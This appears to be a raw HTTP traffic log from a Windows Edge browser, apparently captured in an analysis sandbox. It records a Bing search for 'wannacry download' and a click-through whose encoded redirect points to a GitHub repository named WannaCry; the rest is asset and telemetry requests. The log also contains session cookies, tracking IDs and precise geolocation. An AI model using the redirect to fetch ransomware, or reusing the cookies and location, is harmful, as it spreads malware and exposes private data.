sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199060&WTS=63864795824

Response

HTTP/2.0 200

cache-control: public, max-age=15552000
content-length: 4286
content-type: image/x-icon
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0FD04CFC1A1E485B9EBD8B31934F6D09 Ref B: LTSEDGE0810 Ref C: 2022-12-09T13:31:02Z
date: Thu, 17 Oct 2024 21:04:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199062.14920445
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 750
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199060&WTS=63864795824
GET

https://www.bing.com/ck/a?!&&p=e0cea5766d443c76JmltdHM9MTcyOTEyMzIwMCZpZ3VpZD0zMDM4YWQ3ZC00ZDRmLTZjOTMtMmIyNC1iODY2NGNkODZkYmUmaW5zaWQ9NTIwNA&ptn=3&ver=2&hsh=3&fclid=3038ad7d-4d4f-6c93-2b24-b8664cd86dbe&psq=wannacry+download&u=a1aHR0cHM6Ly9naXRodWIuY29tL2xpbWl0ZWNpL1dhbm5hQ3J5&ntb=1

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /ck/a?!&&p=e0cea5766d443c76JmltdHM9MTcyOTEyMzIwMCZpZ3VpZD0zMDM4YWQ3ZC00ZDRmLTZjOTMtMmIyNC1iODY2NGNkODZkYmUmaW5zaWQ9NTIwNA&ptn=3&ver=2&hsh=3&fclid=3038ad7d-4d4f-6c93-2b24-b8664cd86dbe&psq=wannacry+download&u=a1aHR0cHM6Ly9naXRodWIuY29tL2xpbWl0ZWNpL1dhbm5hQ3J5&ntb=1 HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199060&WTS=63864795824
GET

https://www.bing.com/favicon.ico

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /favicon.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199060&WTS=63864795824
cookie: MSPTC=8c4Lmu2O20cUvDPqpm7k7eRM8BJLsbhZkml3xYVu9aY
GET

https://r.bing.com/rp/DXWOtH36Xc9q8xTmhl8XAK5tw_w.br.css

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/DXWOtH36Xc9q8xTmhl8XAK5tw_w.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: application/signed-exchange;v=b3;q=0.9,*/*;q=0.8
purpose: prefetch
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 03 Oct 2024 11:25:49 GMT
etag: 0x8DCE39E22464029
content-length: 6808
content-type: text/css
content-encoding: br
content-md5: jQ++3sGypR1dMFw4OoBnbQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: eea6ba97-c01e-0043-77bb-15c079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.ba777b5c.1727983657.f44f69c
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=343108
expires: Mon, 21 Oct 2024 20:22:13 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3c4a
timing-allow-origin: *
GET

https://r.bing.com/rp/xvEz2IbMlyghPZ3oNAHr9N-xMOA.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/xvEz2IbMlyghPZ3oNAHr9N-xMOA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:13:56 GMT
etag: 0x8DCDC687406483A
content-length: 2426
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: E6VRkNYBWPjLg+NxAtCPwQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 40439f04-401e-0034-7cc3-174538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=215207
expires: Sun, 20 Oct 2024 08:50:32 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fc3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Ti0kaOD9xRltUyrW1UKvcEi37W4.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/Ti0kaOD9xRltUyrW1UKvcEi37W4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 11 Oct 2024 08:54:26 GMT
etag: 0x8DCE9D24F5128FD
content-length: 9001
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: l6QjRMauPWMp9HJyC4/0Ag==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 320c923c-d01e-0031-4f0e-1cb147000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.8a777b5c.1728682118.b45342f
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=311349
expires: Mon, 21 Oct 2024 11:32:54 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fc4
timing-allow-origin: *
GET

https://r.bing.com/rp/_cQCYzUIUDtiKJi2Mubb5vkdlxs.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/_cQCYzUIUDtiKJi2Mubb5vkdlxs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 2633
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: BqDy58++KpP6pd5VjlogiA==
last-modified: Tue, 24 Sep 2024 06:37:17 GMT
etag: 0x8DCDC6355B25846
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 061be0e8-401e-0059-4031-17ef16000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=146178
expires: Sat, 19 Oct 2024 13:40:03 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fc5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:26:40 GMT
etag: 0x8DCDC61D9BDA003
content-length: 932
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4vFQ72ZNf8ORyGv0/A7BUA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 837d4e76-501e-0002-1798-16e86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=86154
expires: Fri, 18 Oct 2024 20:59:39 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fc6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/OyRnaZe6gJ8kMXuak91zU0baVM4.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/OyRnaZe6gJ8kMXuak91zU0baVM4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:19:21 GMT
etag: 0x8DCDC60D4123841
content-length: 250
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: FoisUan6I6x8k5j8xOd43Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5c4c6dce-901e-0079-4ea2-1483da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=18369
expires: Fri, 18 Oct 2024 02:09:54 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fc7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8dR1RYrnsnPSX-e26dc1yBQAF44.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/8dR1RYrnsnPSX-e26dc1yBQAF44.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 1204
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: IZbFUNKxAIylYfr267f+Iw==
last-modified: Wed, 25 Sep 2024 12:41:09 GMT
etag: 0x8DCDD5F54E641FF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b2e85f54-301e-0019-7be1-16c6f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=113702
expires: Sat, 19 Oct 2024 04:38:47 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fc8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 395
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: bJNwzHWywBuWP28bX2mBGQ==
last-modified: Tue, 24 Sep 2024 06:11:30 GMT
etag: 0x8DCDC5FBB9234C6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5fa04812-b01e-002a-02f0-159fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=168136
expires: Sat, 19 Oct 2024 19:46:01 GMT
date: Thu, 17 Oct 2024 21:03:45 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199025.9ac3fe0
timing-allow-origin: *
